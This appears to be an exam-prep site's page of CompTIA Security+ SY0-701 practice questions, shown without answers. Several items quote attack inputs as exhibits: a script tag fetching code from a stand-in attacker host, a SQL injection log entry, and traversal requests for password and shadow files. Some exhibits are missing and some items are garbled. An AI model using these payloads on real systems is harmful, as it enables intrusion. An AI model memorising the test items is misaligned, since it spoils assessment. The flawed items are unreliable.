Summer Special Sale - 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: spcl70

Practice Free SY0-701 CompTIA Security+ Exam 2026 Exam Questions Answers With Explanation

We at Crack4sure are committed to giving students who are preparing for the CompTIA SY0-701 Exam the most current and reliable questions . To help people study, we've made some of our CompTIA Security+ Exam 2026 exam materials available for free to everyone. You can take the Free SY0-701 Practice Test as many times as you want. The answers to the practice questions are given, and each answer is explained.

Question # 6

A data administrator is configuring authentication for a SaaS application and would like to reduce the number of credentials employees need to maintain. The company prefers to use domain credentials to access new SaaS applications. Which of the following methods would allow this functionality?

A.

SSO

B.

LEAP

C.

MFA

D.

PEAP

Question # 7

A security analyst is monitoring logs from the organization ' s SIEM and identifies logs related to one of their salespeople:

Time | IP address | Location | EmpID | App | Status

14:02 | 72.45.38.27 | Atlanta | 25687 | VPN | Success

14:04 | 72.45.38.27 | Atlanta | 25687 | Email | Failure

14:07 | 58.67.47.48 | Beijing | 25687 | VPN | Success

14:15 | 72.45.38.27 | Atlanta | 25687 | Teams | Success

Which of the following is being displayed in the logs?

A.

Impossible travel

B.

SMTP replay

C.

Directory traversal

D.

Cross-site request forgery

Question # 8

Which of the following best describes the practice of researching laws and regulations related to information security operations within a specific industry?

A.

Compliance reporting

B.

GDPR

C.

Due diligence

D.

Attestation

Question # 9

Which of the following activities is the first stage in the incident response process?

A.

Detection

B.

Declaration

C.

Containment

D.

Vacation

Question # 10

Which of the following would best prepare a security team for a specific incident response scenario?

A.

Situational awareness

B.

Risk assessment

C.

Root cause analysis

D.

Tabletop exercise

Question # 11

A technician wants to improve the situational and environmental awareness of existing users as they transition from remote to in-office work. Which of the following is the best option?

A.

Send out periodic security reminders.

B.

Update the content of new hire documentation.

C.

Modify the content of recurring training.D Implement a phishing campaign

Question # 12

The Chief Information Security Officer wants to discuss options for a disaster recovery site that allows the business to resume operations as quickly as possible. Which of the following solutions meets this requirement?

A.

Hot site

B.

Cold site

C.

Geographic dispersion

D.

Warm site

Question # 13

Which of the following actions best addresses a vulnerability found on a company ' s web server?

A.

Patching

B.

Segmentation

C.

Decommissioning

D.

Monitoring

Question # 14

Which of the following would most likely be used by attackers to perform credential harvesting?

A.

Social engineering

B.

Supply chain compromise

C.

Third-party software

D.

Rainbow table

Question # 15

While updating the security awareness training, a security analyst wants to address issues created if vendors ' email accounts are compromised. Which of the following recommendations should the security analyst include in the training?

A.

Refrain from clicking on images included in emails from new vendors.

B.

Delete emails from unknown service provider partners.

C.

Require that invoices be sent as attachments.

D.

Be alert to unexpected requests from familiar email addresses.

Question # 16

Which of the following is a type of vulnerability that refers to the unauthorized installation of applications on a device through means other than the official application store?

A.

Cross-site scripting

B.

Buffer overflow

C.

Jailbreaking

D.

Side loading

Question # 17

The physical security team at a company receives reports that employees are not displaying their badges. The team also observes employees tailgating at controlled entrances. Which of the following topics will the security team most likely emphasize in upcoming security training?

A.

Social engineering

B.

Situational awareness

C.

Phishing

D.

Acceptable use policy

Question # 18

Which of the following best describes the practice of preserving and documenting the handling of forensic evidence?

A.

Acquisition of evidence

B.

E-discovery

C.

Chain of custody

D.

Forensic tabletop exercises

Question # 19

Which of the following describes effective change management procedures?

A.

Approving the change after a successful deployment

B.

Having a backout plan when a patch fails

C.

Using a spreadsheet for tracking changes

D.

Using an automatic change control bypass for security updates

Question # 20

Following a security review, an organization must ensure users verify their identities against the company ' s identity services with individual credentials leveraging WPA2-Enterprise for wireless access. Which of the following configuration steps correctly applies RADIUS in this environment?

A.

Enabling 802.1X authentication and integrating it with the corporate directory

B.

Installing self-signed certificates on all user devices

C.

Enabling MAC filters for all wireless clients

D.

Configuring the wireless controller to require multifactor authentication

Question # 21

A network security analyst monitors the network’s IDS, which has flagged unusual activity. The IDS has detected multiple login attempts to a database server within a short period. These attempts come from various IP addresses that are not normally recognized by the network’s usual traffic patterns. Each attempt uses the same username and password. Based on the following log output (corrected formatting for readability):

2025-04-10 14:22:01.4532 — Source IP: 192.168.15.101 — Status: Failed — User: JDoe — Action: Login Attempt

2025-04-10 14:22:02.1122 — Source IP: 192.168.15.102 — Status: Failed — User: JDoe — Action: Login Attempt

2025-04-10 14:22:02.7835 — Source IP: 192.168.15.103 — Status: Failed — User: JDoe — Action: Login Attempt

2025-04-10 14:22:03.5637 — Source IP: 192.168.15.104 — Status: Failed — User: JDoe — Action: Login Attempt

2025-04-10 14:22:04.9474 — Source IP: 192.168.15.105 — Status: Failed — User: JDoe — Action: Login Attempt

2025-04-10 14:22:05.5673 — Source IP: 192.168.15.106 — Status: Failed — User: JDoe — Action: Login Attempt

2025-04-10 14:22:06.1573 — Source IP: 192.168.15.107 — Status: Failed — User: JDoe — Action: Login Attempt

2025-04-10 14:22:07.7462 — Source IP: 192.168.15.108 — Status: Failed — User: JDoe — Action: Login Attempt

Which of the following types of network attacks is most likely occurring?

A.

Cross-site scripting

B.

Credential replay

C.

Distributed denial of service

D.

SQL injection

Question # 22

A security administrator recently reset local passwords and the following values were recorded in the system:

SY0-701 question answer

Which of the following in the security administrator most likely protecting against?

A.

Account sharing

B.

Weak password complexity

C.

Pass-the-hash attacks

D.

Password compromise

Question # 23

Which of the following would be the best solution to deploy a low-cost standby site that includes hardware and internet access?

A.

Recovery site

B.

Cold site

C.

Hot site

D.

Warm site

Question # 24

In order to cut costs, a company decides to implement a bring-your-own-device policy. The security team wants a solution that will reduce risk to company data, especially in cases in which devices are lost or stolen. Which of the following tools is best to address this concern?

A.

Mobile device management

B.

Endpoint detection and response

C.

Host-based intrusion detection system

D.

Data loss prevention

Question # 25

A company is concerned with supply chain compromise of new servers and wants to limit this risk. Which of the following should the company review first?

A.

Sanitization procedure

B.

Acquisition process

C.

Change management

D.

Asset tracking

Question # 26

Which of the following should an organization use to protect its environment from external attacks conducted by an unauthorized hacker?

A.

ACL

B.

IDS

C.

HIDS

D.

NIPS

Question # 27

An attacker forces an internal company employee to inject malware into corporate systems under threat of publishing the employee ' s sensitive personal files. Which of the following best describes the attacker ' s motivation in this type of attack?

A.

Financial gain

B.

Revenge

C.

Blackmail

D.

Espionage

Question # 28

An administrator is creating a secure method for a contractor to access a test environment. Which of the following would provide the contractor with the best access to the test environment?

A.

Application server

B.

Jump server

C.

RDP server

D.

Proxy server

Question # 29

A security administrator needs a method to secure data in an environment that includes some form of checks so that the administrator can track any changes. Which of the following should the administrator set up to achieve this goal?

A.

SPF

B.

GPO

C.

NAC

D.

FIM

Question # 30

A security analyst sees an increase of vulnerabilities on workstations after a deployment of a company group policy. Which of the following vulnerability types will the analyst most likely find on the workstations?

A.

Misconfiguration

B.

Zero-day

C.

Malicious update

D.

Supply chain

Question # 31

A security administrator would like to protect data on employees’ laptops. Which of the following encryption techniques should the security administrator use?

A.

Partition

B.

Asymmetric

C.

Full disk

D.

Database

Question # 32

Which of the following control types describes an alert from a SIEM tool?

A.

Preventive

B.

Corrective

C.

Compensating

D.

Detective

Question # 33

A security analyst needs to propose a remediation plan ' or each item in a risk register. The item with the highest priority requires employees to have separate logins for SaaS solutions and different password complexity requirements for each solution. Which of the following implementation plans will most likely resolve this security issue?

A.

Creating a unified password complexity standard

B.

Integrating each SaaS solution with the Identity provider

C.

Securing access to each SaaS by using a single wildcard certificate

D.

Configuring geofencing on each SaaS solution

Question # 34

An organization discovers that its cold site does not have enough storage and computers available. Which of the following was most likely the cause of this failure?

A.

Capacity planning

B.

Load balancing

C.

Backups

D.

Platform diversity

Question # 35

Which of the following documents details how to accomplish a technical security task?

A.

Standard

B.

Policy

C.

Guideline

D.

Procedure

Question # 36

After a recent vulnerability scan, a security engineer needs to harden the routers within the corporate network. Which of the following is the most appropriate to disable?

A.

Console access

B.

Routing protocols

C.

VLANs

D.

Web-based administration

Question # 37

A program manager wants to ensure contract employees can only use the company’s computers Monday through Friday from 9 a.m. to 5 p.m. Which of the following would best enforce this access control?

A.

Creating a GPO for all contract employees and setting time-of-day log-in restrictions

B.

Creating a discretionary access policy and setting rule-based access for contract employees

C.

Implementing an OAuth server and then setting least privilege for contract employees

D.

Implementing SAML with federation to the contract employees ' authentication server

Question # 38

After a security awareness training session, a user called the IT help desk and reported a suspicious call. The suspicious caller stated that the Chief Financial Officer wanted credit card information in order to close an invoice. Which of the following topics did the user recognize from the training?

A.

Insider threat

B.

Email phishing

C.

Social engineering

D.

Executive whaling

Question # 39

A security analyst receives an alert that an employee has clicked on a phishing email and exposed their credentials. Which of the following should the analyst do?

A.

Notify all employees about the phishing attack and instruct them to avoid suspicious emails.

B.

Wait for confirmation from the employee before making any changes to the account.

C.

Reimage the employee ' s workstation to ensure no malware is present.

D.

Lock the employee ' s account to prevent further unauthorized access.

Question # 40

A few weeks after deploying additional email servers, a company begins to receive complaints that messages are going into recipients’ spam folders. Which of the following needs to be updated?

A.

CNAME

B.

SMTP

C.

DLP

D.

SPF

Question # 41

An organization recently updated its security policy to include the following statement:

Regular expressions are included in source code to remove special characters such as $, |, ;. & , `, and ? from variables set by forms in a web application.

Which of the following best explains the security technique the organization adopted by making this addition to the policy?

A.

Identify embedded keys

B.

Code debugging

C.

Input validation

D.

Static code analysis

Question # 42

A security administrator needs to protect the integrity of a compromised laptop. The administrator turns off the laptop for a forensic investigation. Which of the following tasks should the administrator do first before analyzing the hard drive?

A.

Metadata review

B.

Snapshot

C.

Bit-level copy

D.

Memory dump

Question # 43

Which of the following describes the category of data that is most impacted when it is lost?

A.

Confidential

B.

Public

C.

Private

D.

Critical

Question # 44

Which of the following would best allow a company to prevent access to systems from the Internet?

A.

Containerization

B.

Virtualization

C.

SD-WAN

D.

Air-gapped

Question # 45

Which of the following tools can assist with detecting an employee who has accidentally emailed a file containing a customer’s PII?

A.

SCAP

B.

Net Flow

C.

Antivirus

D.

DLP

Question # 46

Which of the following risk analysis attributes measures the chance that a vulnerability will be exploited?

A.

Exposure factor

B.

Impact

C.

Severity

D.

Likelihood

Question # 47

Which of the following security concepts is accomplished when granting access after an individual has logged into a computer network?

A.

Authorization

B.

Identification

C.

Non-repudiation

D.

Authentication

Question # 48

An organization experiences data loss after several employees traveled to an area that is well-known for corporate espionage. The employees always used VPNs when connected to the hotel Wi-Fi, logged off their machines when not in use, and kept their doors locked when leaving their devices unattended. Which of the following will best prevent data loss events in the future?

A.

Data sanitization

B.

WAF

C.

FDE

D.

Split tunneling

Question # 49

A staff member finds a USB drive in the office ' s parking lot. Which of the following should the staff member do?

A.

Notify the file owner after reviewing the contents of the drive.

B.

Use an air-gapped system to open the files without exposing the network.

C.

Wipe the drive immediately using a secure method.

D.

Submit the device to the security team without connecting it.

Question # 50

Which of the following vulnerabilities will lead to a successful attack that injects < IMG src= ' http://attackersite.net/mycode.sh ' > into a web application?

A.

Directory traversal

B.

Buffer overflow

C.

SQLi

D.

XSS

Question # 51

A company uses its backups to recover from a ransomware attack. Which of the following best guarantees that the backups are not infected?

A.

Immutability

B.

Destruction

C.

Sanitization

D.

Retention

Question # 52

Which of the following can be used to identify potential attacker activities without affecting production servers?

A.

Honey pot

B.

Video surveillance

C.

Zero Trust

D.

Geofencing

Question # 53

Which of the following should a security administrator adhere to when setting up a new set of firewall rules?

A.

Disaster recovery plan

B.

Incident response procedure

C.

Business continuity plan

D.

Change management procedure

Question # 54

A cyber operations team informs a security analyst about a new tactic malicious actors are using to compromise networks.

SIEM alerts have not yet been configured. Which of the following best describes what the security analyst should do to identify this behavior?

A.

[Digital forensics

B.

E-discovery

C.

Incident response

D.

Threat hunting

Question # 55

The security operations center is researching an event concerning a suspicious IP address A security analyst looks at the following event logs and discovers that a significant portion of the user accounts have experienced faded log-In attempts when authenticating from the same IP address:

SY0-701 question answer

Which of the following most likely describes attack that took place?

A.

Spraying

B.

Brute-force

C.

Dictionary

D.

Rainbow table

Question # 56

Which of the following is an example of a certificate that is generated by an internal source?

A.

Digital signature

B.

Asymmetric key

C.

Self-signed

D.

Symmetric key

Question # 57

A certificate authority needs to post information about expired certificates. Which of the following would accomplish this task?

A.

TPM

B.

CRL

C.

PKI

D.

CSR

Question # 58

A company discovers suspicious transactions that were entered into the company ' s database and attached to a user account that was created as a trap for malicious activity. Which of the following is the user account an example of?

A.

Honeytoken

B.

Honeynet

C.

Honeypot

D.

Honeyfile

Question # 59

An organization wants to improve the company ' s security authentication method for remote employees. Given the following requirements:

• Must work across SaaS and internal network applications

• Must be device manufacturer agnostic

• Must have offline capabilities

Which of the following would be the most appropriate authentication method?

A.

Username and password

B.

Biometrics

C.

SMS verification

D.

Time-based tokens

Question # 60

When trying to access an internal website, an employee reports that a prompt displays, stating that the site is insecure. Which of the following certificate types is the site most likely using?

A.

Wildcard

B.

Root of trust

C.

Third-party

D.

Self-signed

Question # 61

A company is in the process of cutting jobs to manage costs. The Chief Information Security Officer is concerned about the increased risk of an insider threat. Which of the following would most likely help the security awareness team address this potential threat?

A.

Immediately disable the accounts of staff who are likely to be terminated.

B.

Train supervisors to identify and manage disgruntled employees.

C.

Configure DLP to monitor staff who will be terminated.

D.

Raise awareness for business leaders on social engineering techniques.

Question # 62

Which of the following can a security director use to prioritize vulnerability patching within a company ' s IT environment?

A.

SOAR

B.

CVSS

C.

SIEM

D.

CVE

Question # 63

A security team installs an IPS on an organization ' s network and needs to configure the system to detect and prevent specific network attacks. Which of the following settings should the team configure first within the IPS?

A.

Allow list policies

B.

Packet Inspection

C.

Logging and reporting

D.

Firewall rules

Question # 64

While troubleshooting a firewall configuration, a technician determines that a “deny any” policy should be added to the bottom of the ACL. The technician updates the policy, but the new policy causes several company servers to become unreachable.

Which of the following actions would prevent this issue?

A.

Documenting the new policy in a change request and submitting the request to change management

B.

Testing the policy in a non-production environment before enabling the policy in the production network

C.

Disabling any intrusion prevention signatures on the ' deny any* policy prior to enabling the new policy

D.

Including an ' allow any1 policy above the ' deny any* policy

Question # 65

A company processes a large volume of business-to-business transactions and prioritizes data confidentiality over transaction availability. The company’s firewall administrator must configure a new hardware-based firewall to replace the current one. Which of the following should the administrator do to best align with the company requirements in case a security event occurs?

A.

Ensure the firewall data plane moves to fail-closed mode.

B.

Implement a deny-all rule as the last firewall ACL rule.

C.

Prioritize business-critical application traffic through the firewall.

D.

Configure rate limiting between the firewall interfaces.

Question # 66

An administrator finds that all user workstations and servers are displaying a message that is associated with files containing an extension of .ryk. Which of the following types of infections is present on the systems?

A.

Virus

B.

Trojan

C.

Spyware

D.

Ransomware

Question # 67

Which of the following is a hardware-specific vulnerability?

A.

Firmware version

B.

Buffer overflow

C.

SQL injection

D.

Cross-site scripting

Question # 68

Which of the following data recovery strategies will result in a quick recovery at low cost?

A.

Hot

B.

Cold

C.

Manual

D.

Warm

Question # 69

A company is concerned about weather events causing damage to the server room and downtime. Which of the following should the company consider?

A.

Clustering servers

B.

Geographic dispersion

C.

Load balancers

D.

Off-site backups

Question # 70

Which of the following concepts protects sensitive information from unauthorized disclosure?

A.

Integrity

B.

Availability

C.

Authentication

D.

Confidentiality

Question # 71

A company wants to update its disaster recovery plan to include a dedicated location for immediate continued operations if a catastrophic event occurs. Which of the following options is best to include in the disaster recovery plan?

A.

Hot site

B.

Warm site

C.

Geolocation

D.

Cold site

Question # 72

Which of the following should a security operations center use to improve its incident response procedure?

A.

Playbooks

B.

Frameworks

C.

Baselines

D.

Benchmarks

Question # 73

A systems administrator discovers a system that is no longer receiving support from the vendor. However, this system and its environment are critical to running the business, cannot be modified, and must stay online. Which of the following risk treatments is the most appropriate in this situation?

A.

Refect

B.

Accept

C.

Transfer

D.

Avoid

Question # 74

A Chief Security Officer signs off on a request to allow inbound SMB and RDP from the internet to a single VLAN. Which of the following is the most likely explanation for this activity?

A.

The company built a new file-sharing site.

B.

The organization is preparing for a penetration test.

C.

The security team is integrating with an SASE platform.

D.

The security team created a honeynet.

Question # 75

A systems administrator creates a script that validates OS version, patch levels, and installed applications when users log in. Which of the following examples best describes the purpose of this script?

A.

Resource scaling

B.

Policy enumeration

C.

Baseline enforcement

D.

Guardrails implementation

Question # 76

An organization is building a new backup data center with cost-benefit as the primary requirement and RTO and RPO values around two days. Which of the following types of sites is the best for this scenario?

A.

Real-time recovery

B.

Hot

C.

Cold

D.

Warm

Question # 77

Which of the following should a systems administrator use to ensure an easy deployment of resources within the cloud provider?

A.

Software as a service

B.

Infrastructure as code

C.

Internet of Things

D.

Software-defined networking

Question # 78

Which of the following describes a security alerting and monitoring tool that collects system, application, and network logs from multiple sources in a centralized system?

A.

SIEM

B.

DLP

C.

IDS

D.

SNMP

Question # 79

An administrator is reviewing a single server ' s security logs and discovers the following;

Which of the following best describes the action captured in this log file?

A.

Brute-force attack

B.

Privilege escalation

C.

Failed password audit

D.

Forgotten password by the user

Question # 80

Which of the following explains how to determine the global regulations that data is subject to regardless of the country where the data is stored?

A.

Geographic dispersion

B.

Data sovereignty

C.

Geographic restrictions

D.

Data segmentation

Question # 81

Which of the following would be the greatest concern for a company that is aware of the consequences of non-compliance with government regulations?

A.

Right to be forgotten

B.

Sanctions

C.

External compliance reporting

D.

Attestation

Question # 82

A company wants to use new Wi-Fi-enabled environmental sensors to automatically collect metrics. Which of the following will the security team most likely do?

A.

Add the sensor software to the risk register.

B.

Create a VLAN for the sensors.

C.

Physically air gap the sensors.

D.

Configure TLS 1.2 on all sensors.

Question # 83

A wireless administrator sets up a new network in a small office using a password. The network must reduce the impact of brute-force attacks if the password is subjected to over-the-air interception. Which of the following security settings will help achieve this goal?

A.

WIPS

B.

SSO

C.

WPS

D.

SAE

Question # 84

Which of the following mitigation techniques would a security analyst most likely use to avoid bloatware on devices?

A.

Disabled ports/protocols

B.

Application allow list

C.

Default password changes

D.

Access control permissions

Question # 85

A security team is setting up a new environment for hosting the organization ' s on-premises software application as a cloud-based service. Which of the following should the team ensure is in place in order for the organization to follow security best practices?

A.

Visualization and isolation of resources

B.

Network segmentation

C.

Data encryption

D.

Strong authentication policies

Question # 86

Which of the following tasks is typically included in the BIA process?

A.

Estimating the recovery time of systems

B.

Identifying the communication strategy

C.

Evaluating the risk management plan

D.

Establishing the backup and recovery procedures

E.

Developing the incident response plan

Question # 87

An organization wants to deploy software in a container environment to increase security. Which of the following will limit the organization ' s ability to achieve this goal?

A.

Regulatory compliance

B.

Patch availability

C.

Kernel version

D.

Monolithic code

Question # 88

Which of the following is a benefit of vendor diversity?

A.

Patch availability

B.

Zero-day resiliency

C.

Secure configuration guide applicability

D.

Load balancing

Question # 89

An organization would like to calculate the time needed to resolve a hardware issue with a server. Which of the following risk management processes describes this example?

A.

Recovery point objective

B.

Mean time between failures

C.

Recovery time objective

D.

Mean time to repair  

Question # 90

A company receives an alert that a network device vendor, which is widely used in the enterprise, has been banned by the government.

Which of the following will the company ' s general counsel most likely be concerned with during a hardware refresh of these devices?

A.

Sanctions

B.

Data sovereignty

C.

Cost of replacement

D.

Loss of license

Question # 91

Which of the following activities are associated with vulnerability management? (Select two).

A.

Reporting

B.

Prioritization

C.

Exploiting

D.

Correlation

E.

Containment

F.

Tabletop exercise

Question # 92

A security team must help secure a company site after attackers defaced it. The site must be available to a wide range of countries over a secure protocol, but access from known malicious networks should be blocked. Which of the following will best secure the site?

A.

Next-generation firewall

B.

Reverse proxy

C.

IPSec gateway

D.

Access control server

Question # 93

A company’s web filter is configured to scan the URL for strings and deny access when matches are found. Which of the following search strings should an analyst employ to prohibit access to non-encrypted websites?

A.

encryption=off\

B.

http://

C.

www.*.com

D.

:443

Question # 94

Which of the following techniques would identify whether data has been modified in transit?

A.

Hashing

B.

Tokenization

C.

Masking

D.

Encryption

Question # 95

Various stakeholders are meeting to discuss their hypothetical roles and responsibilities in a specific situation, such as a security incident or major disaster. Which of the following best describes this meeting?

A.

Penetration test

B.

Continuity of operations planning

C.

Tabletop exercise

D.

Simulation

Question # 96

A manager receives an email that contains a link to receive a refund. After hovering over the link, the manager notices that the domain ' s URL points to a suspicious link. Which of the following security practices helped the manager to identify the attack?

A.

End user training

B.

Policy review

C.

URL scanning

D.

Plain text email

Question # 97

A security administrator observed the following in a web server log while investigating an incident:

SY0-701 question answer

Which of the following attacks did the security administrator most likely see?

A.

Privilege escalation

B.

Credential replay

C.

Brute force

D.

Directory traversal

Question # 98

Which of the following describes an executive team that is meeting in a board room and testing the company ' s incident response plan?

A.

Continuity of operations

B.

Capacity planning

C.

Tabletop exercise

D.

Parallel processing

Question # 99

An organization failed to account for the right-to-be-forgotten regulations. Which of the following impacts might this action have on the company?

A.

Fines

B.

Data breaches

C.

Revenue loss

D.

Blackmail

Question # 100

Which of the following should a company use to provide proof of external network security testing?

A.

Business impact analysis

B.

Supply chain analysis

C.

Vulnerability assessment

D.

Third-party attestation

Question # 101

While conducting a business continuity tabletop exercise, the security team becomes concerned by potential impacts if a generator fails during failover. Which of the following is the team most likely to consider in regard to risk management activities?

A.

RPO

B.

ARO

C.

BIA

D.

MTTR

Question # 102

Which of the following actions would reduce the number of false positives for an analyst to manually review?

A.

Create playbooks as part of a SOAR platform

B.

Redefine the patch management process

C.

Replace an EDR tool with an XDR solution

D.

Disable AV heuristics scanning

Question # 103

The management team reports employees are missing features on company-provided tablets, causing productivity issues. The team directs IT to resolve the issue within 48 hours. Which of the following is the best solution?

A.

EDR

B.

COPE

C.

MDM

D.

FDE

Question # 104

A security analyst reviews domain activity logs and notices the following:

SY0-701 question answer

Which of the following is the best explanation for what the security analyst has discovered?

A.

The user jsmith ' s account has been locked out.

B.

A keylogger is installed on [smith ' s workstation

C.

An attacker is attempting to brute force ismith ' s account.

D.

Ransomware has been deployed in the domain.

Question # 105

Which of the following must be considered when designing a high-availability network? (Select two).

A.

Ease of recovery

B.

Ability to patch

C.

Physical isolation

D.

Responsiveness

E.

Attack surface

F.

Extensible authentication

Question # 106

A security administrator is implementing encryption on all hard drives in an organization. Which of the following security concepts is the administrator applying?

A.

Integrity

B.

Authentication

C.

Zero Trust

D.

Confidentiality

Question # 107

A security analyst receives an alert that there was an attempt to download known malware. Which of the following actions would allow the best chance to analyze the malware?

A.

Review the IPS logs and determine which command-and-control IPs were blocked.

B.

Analyze application logs to see how the malware attempted to maintain persistence.

C.

Run vulnerability scans to check for systems and applications that are vulnerable to the malware.

D.

Obtain and execute the malware in a sandbox environment and perform packet captures.

Question # 108

Which of the following is most likely in a responsibility matrix in a cloud computing environment?

A.

The customer is responsible for information and data regardless of the cloud model used.

B.

The cloud provider is responsible for account and identity management for connected devices.

C.

The customer and the cloud provider share responsibility for the physical network infrastructure.

D.

The cloud provider is responsible for the security of endpoints connected to the infrastructure.

Question # 109

Which of the following enables the use of an input field to run commands that can view or manipulate data?

A.

Cross-site scripting

B.

Side loading

C.

Buffer overflow

D.

SQL injection

Question # 110

Which of the following describes the difference between encryption and hashing?

A.

Encryption protects data in transit, while hashing protects data at rest.

B.

Encryption replaces cleartext with ciphertext, while hashing calculates a checksum.

C.

Encryption ensures data integrity, while hashing ensures data confidentiality.

D.

Encryption uses a public-key exchange, while hashing uses a private key.

Question # 111

A legacy device is being decommissioned and is no longer receiving updates or patches. Which of the following describes this scenario?

A.

End of business

B.

End of testing

C.

End of support

D.

End of life

Question # 112

Which of the following best practices gives administrators a set period to perform changes to an operational system to ensure availability and minimize business impacts?

A.

Impact analysis

B.

Scheduled downtime

C.

Backout plan

D.

Change management boards

Question # 113

A company is implementing a vendor ' s security tool in the cloud. The security director does not want to manage users and passwords specific to this tool but would rather utilize the company ' s standard user directory. Which of the following should the company implement?

A.

802.1X

B.

SAML

C.

RADIUS

D.

CHAP

Question # 114

An IT team rolls out a new management application that uses a randomly generated MFA token sent to the administrator’s phone. Despite this new MFA precaution, there is a security breach of the same software. Which of the following describes this kind of attack?

A.

Smishing

B.

Typosquatting

C.

Espionage

D.

Pretexting

Question # 115

While investigating a possible incident, a security analyst discovers the following log entries:

67.118.34.157 ----- [28/Jul/2022:10:26:59 -0300] " GET /query.php?q-wireless%20headphones / HTTP/1.0 " 200 12737

132.18.222.103 ----[28/Jul/2022:10:27:10 -0300] " GET /query.php?q=123 INSERT INTO users VALUES( ' temp ' , ' pass123 ' )# / HTTP/1.0 " 200 935

12.45.101.121 ----- [28/Jul/2022:10:27:22 -0300] " GET /query.php?q=mp3%20players I HTTP/1.0 " 200 14650

Which of the following should the analyst do first?

A.

Implement a WAF

B.

Disable the query .php script

C.

Block brute-force attempts on temporary users

D.

Check the users table for new accounts

Question # 116

Which of the following activities would involve members of the incident response team and other stakeholders simul-ating an event?

A.

Lessons learned

B.

Digital forensics

C.

Tabletop exercise

D.

Root cause analysis

Question # 117

Which of the following best describes a method for ongoing vendor monitoring in third-party risk management?

A.

Requiring a new MSA for each project

B.

Accepting vendor self-attestation without further verification

C.

Conducting assessments to verify compliance with security requirements

D.

Reviewing SLAs at the start of the contract

Question # 118

An IT security team is concerned about the confidentiality of documents left unattended in MFPs. Which of the following should the security team do to mitigate the situation?

A.

Educate users about the importance of paper shredder devices.

B.

Deploy an authentication factor that requires ln-person action before printing.

C.

Install a software client m every computer authorized to use the MFPs.

D.

Update the management software to utilize encryption.

Question # 119

A company is aware of a given security risk related to a specific market segment. The business chooses not to accept responsibility and target their services to a different market segment. Which of the following describes this risk management strategy?

A.

Exemption

B.

Exception

C.

Avoid

D.

Transfer

Question # 120

During a SQL update of a database, a temporary field that was created was replaced by an attacker in order to allow access to the system. Which of the following best describes this type of vulnerability?

A.

Race condition

B.

Memory injection

C.

Malicious update

D.

Side loading

Question # 121

A company wants to ensure secure remote access to its internal network. The company has only one public IP and would like to avoid making any changes to the current network setup. Which of the following solutions would best accomplish this goal?

A.

PAT

B.

IPSec VPN

C.

Perimeter network

D.

Reverse proxy

Question # 122

Which of the following is a technical security control?

A.

Security guard

B.

Policy

C.

Fence

D.

Firewall

Question # 123

A security analyst receives an alert from a web server that contains the following logs:

GET /image?filename=../../../etc/passwd

Host: AcmeInc.web.net

useragent: python-request/2.27.1

GET /image?filename=../../../etc/shadow

Host: AcmeInc.web.net

useragent: python-request/2.27.1

Which of the following attacks is being attempted?

A.

File injection

B.

Privilege escalation

C.

Directory traversal

D.

Cookie forgery

Question # 124

A systems administrator notices that the research and development department is not using the company VPN when accessing various company-related services and systems. Which of the following scenarios describes this activity?

A.

Espionage

B.

Data exfiltration

C.

Nation-state attack

D.

Shadow IT

Question # 125

A Chief Information Security Officer (CISO) has developed information security policies that relate to the software development methodology. Which of the following would the CISO most likely include in the organization ' s documentation?

A.

Peer review requirements

B.

Multifactor authentication

C.

Branch protection tests

D.

Secrets management configurations

Question # 126

An administrator discovers that some files on a database server were recently encrypted. The administrator sees from the security logs that the data was last accessed by a domain user. Which of the following best describes the type of attack that occurred?

A.

Insider threat

B.

Social engineering

C.

Watering-hole

D.

Unauthorized attacker

Question # 127

A company wants to protect a specialized legacy platform that controls the physical flow of gas inside of pipes. Which of the following environments does the company need to secure to best achieve this goal?

A.

IaaS

B.

SCADA

C.

SDN

D.

IoT

Question # 128

Which of the following describes when a user installs an unauthorized application by bypassing the authorized application store and installing a binary file?

A.

Jailbreaking

B.

Sideloading

C.

Memory injection

D.

VM escaping

Question # 129

Which of the following is a benefit of launching a bug bounty program? (Select two)

A.

Transference of risk to a third party

B.

Reduction in the number of zero-day vulnerabilities

C.

Increased security awareness for the workforce

D.

Reduced cost of managing the program

E.

Quicker discovery of vulnerabilities

F.

Improved patch management process

Question # 130

A security technician determines that no additional patches can be applied to an application and the risks of operating as such must be accepted. Additionally, only a limited number of network services should utilize the application. Which of the following best describes this type of mitigation?

A.

Patching

B.

Segmentation

C.

Isolation

D.

Monitoring

Question # 131

A security administrator wants to implement a security information and event management system. The administrator must first collect network traffic on the switch to gain visibility of the network. Which of the following is the most appropriate method?

A.

Syslog

B.

Port mirroring

C.

Port forwarding

D.

Load balancer logs

Question # 132

Various company stakeholders meet to discuss roles and responsibilities in the event of a security breach that would affect offshore offices. Which of the following is this an example of?

A.

Tabletop exercise

B.

Penetration test

C.

Geographic dispersion

D.

Incident response

Question # 133

An administrator implements web-filtering products but still sees that users are visiting malicious links. Which of the following configuration items does the security administrator need to review?

A.

Intrusion prevention system

B.

Content categorization

C.

Encryption

D.

DNS service

Question # 134

A company is working with a vendor to perform a penetration test Which of the following includes an estimate about the number of hours required to complete the engagement?

A.

SOW

B.

BPA

C.

SLA

D.

NDA

Question # 135

A website user is locked out of an account after clicking an email link and visiting a different website Web server logs show the user ' s password was changed, even though the user did not change the password. Which of the following is the most likely cause?

A.

Cross-sue request forgery

B.

Directory traversal

C.

ARP poisoning

D.

SQL injection

Question # 136

A systems administrator receives the following alert from a file integrity monitoring tool:

The hash of the cmd.exe file has changed.

The systems administrator checks the OS logs and notices that no patches were applied in the last two months. Which of the following most likely occurred?

A.

The end user changed the file permissions.

B.

A cryptographic collision was detected.

C.

A snapshot of the file system was taken.

D.

A rootkit was deployed.

Question # 137

A security team purchases a tool for cloud security posture management. The team is quickly overwhelmed by the number of misconfigurations that the tool detects. Which of the following should the security team configure to establish workflows for cloud resource security?

A.

CASB

B.

IAM

C.

SOAR

D.

XDR

Question # 138

A security engineer is installing an IPS to block signature-based attacks in the environment. Which of the following modes will best accomplish this task?

A.

Monitor

B.

Sensor

C.

Audit

D.

Active

Question # 139

A software developer released a new application and is distributing the application files through the developer’s website. Which of the following should the developer post on the website to allow users to verify the integrity of the downloaded files?

A.

Hashes

B.

Certificates

C.

Algorithms

D.

Salting

Question # 140

During a risk treatment exercise, an administrator discovers a risk that cannot be mitigated. Which of the following best describes this situation?

A.

Residual risk

B.

Risk appetite

C.

Reviewed risk

D.

Risk register

Question # 141

The local administrator account for a company ' s VPN appliance was unexpectedly used to log in to the remote management interface. Which of the following would have most likely prevented this from happening ' ?

A.

Using least privilege

B.

Changing the default password

C.

Assigning individual user IDs

D.

Reviewing logs more frequently

Question # 142

